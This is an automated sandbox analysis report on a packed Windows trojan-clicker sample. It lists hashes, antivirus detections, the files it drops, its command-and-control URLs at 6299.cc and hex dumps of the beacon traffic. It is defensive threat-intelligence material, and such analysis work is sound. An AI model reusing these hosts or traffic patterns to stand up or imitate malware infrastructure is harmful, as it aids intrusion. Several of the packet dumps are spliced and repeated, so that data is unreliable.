Analysis Date2015-01-20 19:46:15
MD503f361f5a4ab6871cd39b8460c4f662a
SHA1dac9fb7d30f352ac66ec2ce3c404db941bce2227

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: ea1381db2e946a01c63f974f8bc23c44 sha1: dcce274c7ed56bba27ebc32f88fa93dd6b63adde size: 67072
Section.rsrc md5: 7473cf07c0128101ef1e0d0db6cda15f sha1: 8f8a0bb703878b9754182680e9052b0598a6d175 size: 3072
Timestamp2014-11-29 06:37:50
VersionLegalCopyright: 版权所有 (C) 2014
InternalName: OverbearingWeb
FileVersion: 1, 0, 0, 1
CompanyName:
LegalTrademarks:
ProductName: OverbearingWeb 应用程序
ProductVersion: 1, 0, 0, 1
FileDescription: OverbearingWeb Microsoft 基础类应用程序
OriginalFilename: OverbearingWeb.EXE
PackerUPX -> www.upx.sourceforge.net
PEhashd35eadd9df26e932699227a635ee44ee972b9188
IMPhash843a92137552816abbed133539d1f2f9
AV360 Safeno_virus
AVAd-AwareTrojan.Generic.12520079
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Trojan.Generic.12520079
AVAuthentiumW32/Downloader-Web-based!Maximu
AVAvira (antivir)TR/Agent.69632.608
AVBullGuardTrojan.Generic.12520079
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.Generic.12520079
AVEset (nod32)Win32/Agent.WEW
AVFortinetW32/Agent.CBIV!tr
AVFrisk (f-prot)W32/Downloader-Web-based!Maximu
AVF-SecureTrojan.Generic.12520079
AVGrisoft (avg)Agent4.CAYO.dropper
AVIkarusTrojan-Clicker.Win32.Agent
AVK7Trojan ( 004a0a271 )
AVKasperskyTrojan-Clicker.Win32.Agent.cbiv
AVMalwareBytesno_virus
AVMcafeeRDN/Generic.grp!hl
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Trojan.Generic.12520079
AVRisingno_virus
AVSophosno_virus
AVSymantecBackdoor.Trojan
AVTrend Microno_virus
AVVirusBlokAda (vba32)TrojanClicker.Agent

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\dac9fb7d30f352ac66ec2ce3c404db941bce2227.INI
Creates FileC:\chrome.exe
Creates MutexsdfadfwefawCOverbearingWebAppefaefaf
Winsock URLhttp://wangbao.6299.cc/xc.txt
Winsock URLhttp://www.ip138.com

Network Details:

DNSyd.ecoma.glb0.lxdns.com
Type: A
61.140.13.81
DNSyd.ecoma.glb0.lxdns.com
Type: A
61.140.13.85
DNSyd.ecoma.glb0.lxdns.com
Type: A
61.140.13.87
DNSyd.ecoma.glb0.lxdns.com
Type: A
61.140.13.80
DNS2c20bdadcc004a3d.cdn.fhldns.com
Type: A
222.216.190.60
DNS2c20bdadcc004a3d.cdn.fhldns.com
Type: A
61.155.149.77
DNSflow3002.6299.cc
Type: A
218.85.133.70
DNSwww.ip138.com
Type: A
DNSwangbao.6299.cc
Type: A
HTTP GEThttp://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://wangbao.6299.cc/xc.txt
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POSThttp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP POSThttp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POSThttp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POSThttp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POSThttp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP GEThttp://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POSThttp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
Flows TCP192.168.1.1:1031 ➝ 61.140.13.81:80
Flows TCP192.168.1.1:1032 ➝ 222.216.190.60:80
Flows TCP192.168.1.1:1033 ➝ 61.140.13.81:80
Flows TCP192.168.1.1:1034 ➝ 218.85.133.70:80
Flows TCP192.168.1.1:1035 ➝ 218.85.133.70:80
Flows TCP192.168.1.1:1036 ➝ 61.140.13.81:80
Flows TCP192.168.1.1:1037 ➝ 218.85.133.70:80
Flows TCP192.168.1.1:1038 ➝ 61.140.13.81:80
Flows TCP192.168.1.1:1039 ➝ 218.85.133.70:80
Flows TCP192.168.1.1:1040 ➝ 61.140.13.81:80
Flows TCP192.168.1.1:1041 ➝ 218.85.133.70:80
Flows TCP192.168.1.1:1042 ➝ 61.140.13.81:80
Flows TCP192.168.1.1:1043 ➝ 218.85.133.70:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a         ip138.com....

0x00000000 (00000)   47455420 2f78632e 74787420 48545450   GET /xc.txt HTTP
0x00000010 (00016)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000020 (00032)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000030 (00048)   6f6d7061 7469626c 65290d0a 486f7374   ompatible)..Host
0x00000040 (00064)   3a207761 6e676261 6f2e3632 39392e63   : wangbao.6299.c
0x00000050 (00080)   630d0a0d 0a                           c....

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a392e63   ip138.com....9.c
0x00000050 (00080)   630d0a0d 0a                           c....

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2032 39350d0a 43616368   ength: 295..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d4441   che....parems=DA
0x000000e0 (00224)   46333130 46333334 32323845 34433545   F310F334228E4C5E
0x000000f0 (00240)   33304246 32304330 46443332 35314537   30BF20C0FD3251E7
0x00000100 (00256)   37383330 43453244 34444234 44424136   7830CE2D4DB4DBA6
0x00000110 (00272)   44423334 36343533 37314434 39334433   DB34645371D493D3
0x00000120 (00288)   41463846 38393534 31413639 41343330   AF8F89541A69A430
0x00000130 (00304)   33374131 38373138 46344434 39323733   37A18718F4D49273
0x00000140 (00320)   38454539 44443841 34434244 42324239   8EE9DD8A4CBDB2B9
0x00000150 (00336)   42374645 31414531 33383534 38413641   B7FE1AE138548A6A
0x00000160 (00352)   45373633 38424146 43353541 34374439   E7638BAFC55A47D9
0x00000170 (00368)   31433238 43324638 32323532 42463042   1C28C2F82252BF0B
0x00000180 (00384)   37333333 42394633 34373331 33383936   7333B9F347313896
0x00000190 (00400)   36433642 33323941 35433235 45423945   6C6B329A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a2d5479   ip138.com....-Ty
0x00000050 (00080)   70653a20 74657874 2f68746d 6c0d0a44   pe: text/html..D
0x00000060 (00096)   6174653a 20547565 2c203230 204a616e   ate: Tue, 20 Jan
0x00000070 (00112)   20323031 35203139 3a35323a 30312047    2015 19:52:01 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a74696f   ip138.com....tio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a74696f   ip138.com....tio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a74696f   ip138.com....tio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
